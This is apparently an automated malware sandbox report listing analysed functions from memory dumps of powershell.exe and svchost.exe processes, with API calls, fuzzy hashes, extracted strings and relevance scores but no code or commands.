Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 50ec1317136817eda71aa2086a0490e69b0e865a8efc9e69dd8e3e0fded74307
Instruction ID: f1abc94de78fd45dfb02830bd9d10965a5f256e84794afdd09ea695beae7c0aa
Opcode Fuzzy Hash: 50ec1317136817eda71aa2086a0490e69b0e865a8efc9e69dd8e3e0fded74307
Instruction Fuzzy Hash: 2F7124B4A00B058FDB24DF2AC54476BB7F5BF88214F008A29D54AD7B50EB36E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05664E04, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05665416,?,?,?,?,?), ref: 056654D7

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 41e80f45b2d2a020c4c931dbbf5e48b4d86701c29fe6d2ffefdbd7f252c8dad4
Instruction ID: 66120eb3473a61aaa2ad83cdb7a5bf3a29d33d8a29fb85ae15d10444134a14be
Opcode Fuzzy Hash: 41e80f45b2d2a020c4c931dbbf5e48b4d86701c29fe6d2ffefdbd7f252c8dad4
Instruction Fuzzy Hash: F421E3B5D002089FDB10CF99D584AEEBBF4EB48324F54855AE919B7310D375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0566544A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05665416,?,?,?,?,?), ref: 056654D7

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 69ec6d3c16d951f0b012e46a03360f5336ce3c8cba5722835a79353644aee249
Instruction ID: 7cecbb3f6e1971a54802a763076d7dbe12eac18a37400e3bf0ada7c170e2df8d
Opcode Fuzzy Hash: 69ec6d3c16d951f0b012e46a03360f5336ce3c8cba5722835a79353644aee249
Instruction Fuzzy Hash: 0921E4B5D002089FDB10CFA9D984ADEFBF4FB48324F14851AE919A3310D375A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0566D9B8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0566E769,00000800,00000000,00000000), ref: 0566E97A

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 06c951128fc9759a7eb37d9cfad5e17129b955d18d711b6a9cfd5d4406bd9ece
Instruction ID: a9c3dbc197b1359afdd9a711aae4c992c3e9f8eedca328163c18c69f93ce1bde
Opcode Fuzzy Hash: 06c951128fc9759a7eb37d9cfad5e17129b955d18d711b6a9cfd5d4406bd9ece
Instruction Fuzzy Hash: AA1106B5D042098FCB10CF9AC544BDEFBF8AB48320F04892AD419A7610D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0566E908, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0566E769,00000800,00000000,00000000), ref: 0566E97A

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d2f125c61f2db212ce060ca2e47c5d32dd2eed9771d3d46172e4a209ad752241
Instruction ID: 2c3febe0ed1887eed09f04e164b934b50cfcfe3cb9ffd309fd25278f68c4cfa7
Opcode Fuzzy Hash: d2f125c61f2db212ce060ca2e47c5d32dd2eed9771d3d46172e4a209ad752241
Instruction Fuzzy Hash: 0C1112BAD002098FCB10CF99D548BEEFBF4AF48324F19852AD529B7610C775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0566D974, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0566E4BB), ref: 0566E6EE

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a232a183f9769ecbd0f443a5043242305e5e0d4d9ab6ef08d7823679e65fa499
Instruction ID: 63bc28674ec7f7bdc4538c6dadeae61a702a9f31be3682dff4454d42e0397a46
Opcode Fuzzy Hash: a232a183f9769ecbd0f443a5043242305e5e0d4d9ab6ef08d7823679e65fa499
Instruction Fuzzy Hash: 761104B5D006498FCB10CF9AC544BDFFBF8EB88224F14851AD419A7610D376A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0566B2F8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0566B35D

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7bba3486d5058e92f8c8c49b0337ceaf8c5d554d1a4c5750a9f115890cf710b9
Instruction ID: f760eceb9bc11a60ab2014a5c8a6200f202b637ddb180f7706a63ec7a4b99734
Opcode Fuzzy Hash: 7bba3486d5058e92f8c8c49b0337ceaf8c5d554d1a4c5750a9f115890cf710b9
Instruction Fuzzy Hash: 79118B71D05398CECB10CF95D5497EABFF4AB05324F048859E446B3681CB799A04CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0566B2F7, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0566B35D

Memory Dump Source

Source File: 00000011.00000002.547587678.0000000005660000.00000040.00000001.sdmp, Offset: 05660000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a19f432132e5b02e3ac24e0488a721691b6dd6b86c0bd725fb2fc4f4c40721a5
Instruction ID: 3ef881238f5b31395f78970859f43ce86cfe7e38f81da0815b48ebdf6c7ab71c
Opcode Fuzzy Hash: a19f432132e5b02e3ac24e0488a721691b6dd6b86c0bd725fb2fc4f4c40721a5
Instruction Fuzzy Hash: 4D119A75D01398CECB10CF95D5497EABFF4AB04324F04885AE486B3681CB799A04CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00FED3DC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.511839159.0000000000FED000.00000040.00000001.sdmp, Offset: 00FED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77bf34440c32fd2d0d7947eb0819a550bd07d6d31189629dab10bd8028255db3
Instruction ID: a7f5c15c57260b47c337334a37f639a2530b29684a9ceecddcc3123ce11e8a7c
Opcode Fuzzy Hash: 77bf34440c32fd2d0d7947eb0819a550bd07d6d31189629dab10bd8028255db3
Instruction Fuzzy Hash: 10213A72504284DFCF04DF10D9C4F26BB66FBA4324F24C569E9054B686C336E856E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.512381969.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65f73fc68d14228c4da3c6cc49cf2330ecd83769ae4446e60a1316b83b3d09b5
Instruction ID: a958365d32cc37d39699de90eb70fba2239bea7c6ef4f281747ca5701fc762b6
Opcode Fuzzy Hash: 65f73fc68d14228c4da3c6cc49cf2330ecd83769ae4446e60a1316b83b3d09b5
Instruction Fuzzy Hash: D3213771608248DFCB14DF10D5C4F36BB62FF84324F24C969DA094B26ACB36D847DA62

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.512381969.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bc6bd8cc69a62ff479cf487b69ec77613f74c4b4d3090fd3c469d6da426b499
Instruction ID: ed1b5c02a77a667b13322909a17624160b04c3b38778569e5232d18cf7d603ec
Opcode Fuzzy Hash: 9bc6bd8cc69a62ff479cf487b69ec77613f74c4b4d3090fd3c469d6da426b499
Instruction Fuzzy Hash: E42183755093C48FCB02CF20D590B15BF71EF46324F28C5EAD9458B667C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FED3D7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.511839159.0000000000FED000.00000040.00000001.sdmp, Offset: 00FED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d838226bc16e0845f65d18a922d88f0f92716b460af501a39e48939d31f0a21
Instruction ID: d870730ea7974b26bed942f4885fa620f8b983ba0fde10ec20143d259634183a
Opcode Fuzzy Hash: 5d838226bc16e0845f65d18a922d88f0f92716b460af501a39e48939d31f0a21
Instruction Fuzzy Hash: DA11E676804280DFCF05CF10D5C4B16BF72FB94324F24C6A9D8040BA56C33AE856DBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 6624 Parent PID: 5308 powershell.exeCOMMON

Executed Functions

Function 00913318, Relevance: 8.6, Strings: 6, Instructions: 1107COMMON

Download Yara Rule

Strings

:W, xrefs: 00913C41
,=W, xrefs: 00913FAD
:W, xrefs: 0091342E
:W, xrefs: 009135CE
:W, xrefs: 0091352C
,=W, xrefs: 00913F04

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID: ,=W$,=W$:W$:W$:W$:W
API String ID: 0-2803010537
Opcode ID: 922234833e6829eac6d5466f19be0bdf80d5d06c75fb7895d49f0cf9121ea852
Instruction ID: d7e2c71688d20013c67836d02a283756e0863557ca4915b9267304219e73c76b
Opcode Fuzzy Hash: 922234833e6829eac6d5466f19be0bdf80d5d06c75fb7895d49f0cf9121ea852
Instruction Fuzzy Hash: 2FA23974B006048FCB24DF28C5889AEB7F6FF88314B258998E556DB362DB31ED85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00914478, Relevance: 6.1, Strings: 3, Instructions: 2379COMMON

Download Yara Rule

Strings

,=W, xrefs: 009159C0
@?W, xrefs: 00914A5B
,=W, xrefs: 00915A66

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID: ,=W$,=W$@?W
API String ID: 0-3654478565
Opcode ID: 97223c4d4c17b38c3b94589bbc217d9fd0fa2df89ee639193239e4db62bb43a4
Instruction ID: 1058dccbca95f8e8ec3a05c1f320162daaa007c593c76d46553b5de5a7f45244
Opcode Fuzzy Hash: 97223c4d4c17b38c3b94589bbc217d9fd0fa2df89ee639193239e4db62bb43a4
Instruction Fuzzy Hash: 02232974700A14CFCB28DF24C598AAAB7F6FF99715B224998E556CB361CB30EC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00916258, Relevance: 4.2, Strings: 2, Instructions: 1714COMMON

Download Yara Rule

Strings

,=W, xrefs: 009162E3
TBW, xrefs: 009166A1

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID: ,=W$TBW
API String ID: 0-3557022955
Opcode ID: be79c70e2b333849139e5b3805717be7c7b99acc85e672c8a6fbcb0f2a0edf0d
Instruction ID: d40d68b8c67bd7439e4ddb88a613a00251fe49f559b65e77c73dee2b195302bf
Opcode Fuzzy Hash: be79c70e2b333849139e5b3805717be7c7b99acc85e672c8a6fbcb0f2a0edf0d
Instruction Fuzzy Hash: FDF26A74B04604CFCB24DF68C588AA9B7F6FF89314B258999E516CB362CB31EC85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00918198, Relevance: 2.0, Strings: 1, Instructions: 707COMMON

Download Yara Rule

Strings

2l, xrefs: 00918634

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID: 2l
API String ID: 0-3127262868
Opcode ID: b28bba87736ad5bf9b24f212e146f2aa9ad69b2aeb70952efa61fd164a7b6cd2
Instruction ID: 5848faf65158849fac621c7e1098bc99e3054b99a7273c98add5022edfa25893
Opcode Fuzzy Hash: b28bba87736ad5bf9b24f212e146f2aa9ad69b2aeb70952efa61fd164a7b6cd2
Instruction Fuzzy Hash: AF521D74B002188FCB14DF64D898AAEB7B6FF89314F158469E9069B361CB35EC85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E167C0, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.521663234.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4706920139980a86aa8740e2086aac168fc656ad95e0a6ead4db512b7a08c960
Instruction ID: aa2ef8d3b3199669c11e9e72707c9f37e18bd0c1a9109027001f3da4365dc2d5
Opcode Fuzzy Hash: 4706920139980a86aa8740e2086aac168fc656ad95e0a6ead4db512b7a08c960
Instruction Fuzzy Hash: 251157327041205BC729266EA8186FF3ADADBC57A9B15007BE505DB392CE64CC4683A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1C5C8, Relevance: 1.6, APIs: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00E1C6F2

Memory Dump Source

Source File: 00000012.00000002.521663234.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b0d27b553e172297a9f11f3b4239703e41f64316927d83bcce1704367ba176e1
Instruction ID: 22ff765b57049b98a64a24db946fadc93cfc8c3153b1d8c7b90eeae75acfff6c
Opcode Fuzzy Hash: b0d27b553e172297a9f11f3b4239703e41f64316927d83bcce1704367ba176e1
Instruction Fuzzy Hash: 0841B0B1A042499FDB00DFA9C845BDEFBF5FB48714F15816AE609AB381C774A940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1C668, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00E1C6F2

Memory Dump Source

Source File: 00000012.00000002.521663234.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: db2358e5feaf6d53de04c6e4787666fae7329ed5984c7a1ba14a03213927f395
Instruction ID: 446b0d1ecf88e938d20c92e35ea181a855aa2ce2041020f7530bc20dde7a3dd1
Opcode Fuzzy Hash: db2358e5feaf6d53de04c6e4787666fae7329ed5984c7a1ba14a03213927f395
Instruction Fuzzy Hash: 692154B2D00219AFCB00CF99C884AEEFBB4FB48324F10811AE919B7200C774A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00917BDE, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

tIW, xrefs: 00917D29

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID: tIW
API String ID: 0-2014128517
Opcode ID: 94a0a7624a157a79010d9ecf1e07d050bdb6c9fe611f0d8c535be59a3eddbab2
Instruction ID: 20105058dd953389f8e97e6187b86537860670b0a6a85610b3f1f511a9f20aea
Opcode Fuzzy Hash: 94a0a7624a157a79010d9ecf1e07d050bdb6c9fe611f0d8c535be59a3eddbab2
Instruction Fuzzy Hash: 8151A130B04208AFD705EBA4D895BAEB7F2EF85304F2584A9E505AF792CF319D45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0091818A, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce2d607382aae34bde0555b3c479cf1d34a70b531c80d6e29749d2894ea983ed
Instruction ID: 68d60b26b099b9a311bbf0477cf32c98dd8a1674c86d7c2d92840aa45690d5f2
Opcode Fuzzy Hash: ce2d607382aae34bde0555b3c479cf1d34a70b531c80d6e29749d2894ea983ed
Instruction Fuzzy Hash: 13713E74B101189FCB18EF64C894AAFBBF6EF88710F148069D906A7395CF759C42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00917E10, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d24522f36900a2e64ae270527682c56494bf4db727b293a70a2c5386edda15
Instruction ID: ed89de10b0ea57ee32d09e347ae4cfbb78b6d718b170fbfad3c098a4c5ce6d48
Opcode Fuzzy Hash: 58d24522f36900a2e64ae270527682c56494bf4db727b293a70a2c5386edda15
Instruction Fuzzy Hash: 5F21EF35B011188FD715AF64C804AEEB7F2EF89711F2185B9D806AB3A1CF319D45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00918BF8, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1404727cf3c4ff39c257b8c951a5c89382ef226ecc476b27b05173a99db87849
Instruction ID: d5daaf61058a9ca476091e3796ab6bd3f1ebeb60e4d21827c19a48cde7ec8249
Opcode Fuzzy Hash: 1404727cf3c4ff39c257b8c951a5c89382ef226ecc476b27b05173a99db87849
Instruction Fuzzy Hash: EE21C0B5D0526A9FCB16CFA9C4809EEFBB0BF49210F14845AE895B7211C234A941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00918C08, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26d2c418bd4702e38f58fa3af0a2b77a7693ca2a3141866124265cce2137701e
Instruction ID: 7eed900f8dac4b769fbe98fb518d2c2a87abccc32a002412ca721b2b46251e71
Opcode Fuzzy Hash: 26d2c418bd4702e38f58fa3af0a2b77a7693ca2a3141866124265cce2137701e
Instruction Fuzzy Hash: 0021B0B5E0122A9BCB15CF9AC5809EEFBB4BF4C310F14841AE954B3310D734A941DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00917851, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40144721727d2f2f6d8aa1a03f7af2e4c95974074f640c138ecc18a07d29b5eb
Instruction ID: 4fa07f9d8a86aac7c133ae30010fd418041075edca2c34bcadb731cf818b72e2
Opcode Fuzzy Hash: 40144721727d2f2f6d8aa1a03f7af2e4c95974074f640c138ecc18a07d29b5eb
Instruction Fuzzy Hash: E1113A71A081099FDB44DF6CC884BAEB7E1AF88310F158165E9099B351DB759981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00917860, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.512946153.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 088852d93ddeaeec4fa3d75082b2c6498c42becd881d65195e6c7fa9df9718e7
Instruction ID: be05cb2302f169a713bdf51958298243b2168ce5af8bde3165bf3f601fcc80c8
Opcode Fuzzy Hash: 088852d93ddeaeec4fa3d75082b2c6498c42becd881d65195e6c7fa9df9718e7
Instruction Fuzzy Hash: 82112771F041099FDB54EFA8C884BAFB7E5EB88720F158065E9099B340DB759D81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D006, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.515675517.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d3cac26f1780528d72f92c2809898490ea57edd02ec0eeea1ebc1e4d5fb4
Instruction ID: 4db17895a465535a845f40a24101c7b9c94c89e6de1f77a6da94c4e1693e55d1
Opcode Fuzzy Hash: c2a2d3cac26f1780528d72f92c2809898490ea57edd02ec0eeea1ebc1e4d5fb4
Instruction Fuzzy Hash: 73019E6140D3C05FD7164B259C947A2BFF8EF53624F1980CBE9849F2A7C2695C45C772

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.515675517.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3fbecf724671f46d3e3484009d9bb714f313030336edea68161dc5a31e3207
Instruction ID: cadaf1d4e8e7fefcb454dee6f29dec225f888d928c2f2ae5ee31055714db0888
Opcode Fuzzy Hash: ff3fbecf724671f46d3e3484009d9bb714f313030336edea68161dc5a31e3207
Instruction Fuzzy Hash: D8012B71508344AED7144F25ECC4B63BBD8EF41B74F28C19AEE045B286C3799945C6B2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E153E1, Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.521663234.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d13c7c2cc22fbcbafdb32ef481b950d66c812282a2f7a9fdd0161f3a875e3b2
Instruction ID: aa65f4e3eaa4cd7eb4fc91c7e78b914345d88e0191fc8ac84e2f021d68c7da07
Opcode Fuzzy Hash: 4d13c7c2cc22fbcbafdb32ef481b950d66c812282a2f7a9fdd0161f3a875e3b2
Instruction Fuzzy Hash: 0651183872410C8FDF145B74ED657AE3AA7EBC8318F608025E916A3792CF75AC11A792

Uniqueness

Uniqueness Score: -1.00%

Function 00E15841, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.521663234.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e89cbb062b5802e682874cd0c8d95c3588d1b3272d5247b9d199923e595976
Instruction ID: 5d9147d723d653bdb0e03d352ef7bfcea09e857a53f07700d6a51f5ec253ff24
Opcode Fuzzy Hash: 19e89cbb062b5802e682874cd0c8d95c3588d1b3272d5247b9d199923e595976
Instruction Fuzzy Hash: 0201DFB1B00611CFCB14ABB8D840AFE77F5AFC9324B100479E50AEB391EA318C0187E1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 7148 Parent PID: 6956 svchost.exeCOMMON

Executed Functions

Function 0574E4A8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4f0c752024ad46fff71a25e9b1feb9f48d31127c5ec28ad4791ac05fe67d15f7
Instruction ID: 372d0349f2281694d26caa4d28723daff3d54197aa835563e7e1210c0b0af4d6
Opcode Fuzzy Hash: 4f0c752024ad46fff71a25e9b1feb9f48d31127c5ec28ad4791ac05fe67d15f7
Instruction Fuzzy Hash: 00714670A00B058FD724DF6AD544B5AB7F5FF88214F008A2DD44AD7A40EB74E845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 05744E04, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05745416,?,?,?,?,?), ref: 057454D7

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: faa242434a6ac0407581047fca581f9f632fd07efe0ba6c2c0677379a730197a
Instruction ID: f530fed1643ba6b9ebbd1cb06d1b7d89c3e0d9afc8824270ef1e2a3c17d77473
Opcode Fuzzy Hash: faa242434a6ac0407581047fca581f9f632fd07efe0ba6c2c0677379a730197a
Instruction Fuzzy Hash: A321E3B5D04208AFDB10CF99D984ADEBBF8EB48324F14801AE919B7310D378A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574D9A0, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0574E769,00000800,00000000,00000000), ref: 0574E97A

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c37008ebc1139427238bf73d0f32e74a19a4c2917f63e098a79e92a58491285
Instruction ID: d89d9af90a3ca2e69d3cdaf7c9f4fdf11ebd30f349f2c4864d4e2ad2dd19c608
Opcode Fuzzy Hash: 3c37008ebc1139427238bf73d0f32e74a19a4c2917f63e098a79e92a58491285
Instruction Fuzzy Hash: EB216AB6D043498FDB10CF99D448BDEFBF8BB89324F14842AD955A7241C374A544CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 05745449, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05745416,?,?,?,?,?), ref: 057454D7

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eb96d96fc0307c33d86e6e67048bd2b378dfc8dc6f7079dea41f11eefb45ae31
Instruction ID: 611ad523c340fae21e208d7b5d06b4bda2f899c38806b66bd4607ba0dc60a626
Opcode Fuzzy Hash: eb96d96fc0307c33d86e6e67048bd2b378dfc8dc6f7079dea41f11eefb45ae31
Instruction Fuzzy Hash: 3421E3B5D00248DFDB10CF99D584ADEFBF4FB48324F14841AE914A7250D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0574D9B8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0574E769,00000800,00000000,00000000), ref: 0574E97A

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 867e075be434ad01e7982d023ea76515e9bc1a4ca98c6fee11f3e178ea9325b5
Instruction ID: faa381304e6412d47769c80c42bb83f125b0d94086459a1d48511e513ec5e4d3
Opcode Fuzzy Hash: 867e075be434ad01e7982d023ea76515e9bc1a4ca98c6fee11f3e178ea9325b5
Instruction Fuzzy Hash: BE1108B5D042099FDB10CF9AC448BDEFBF8BB48320F14842AD919A7240C375A545CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0574E908, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0574E769,00000800,00000000,00000000), ref: 0574E97A

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7f0eebc3c908864e447a0250cdd6950704dba660d21468129878d8ecf2ca3d62
Instruction ID: c6740711b1629ff974fafb8cb1d65127e67be763ac0a9e51ac17c4ab5ac399e0
Opcode Fuzzy Hash: 7f0eebc3c908864e447a0250cdd6950704dba660d21468129878d8ecf2ca3d62
Instruction Fuzzy Hash: 7211F2B6D042098FDB14CF99D548BDEFBF4BB48324F14842AD559A7640C374A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0574D974, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0574E4BB), ref: 0574E6EE

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a3f9f3838b79d800281b1ef1090c6b4a0884c7db8301f3afda2347f462b24ac4
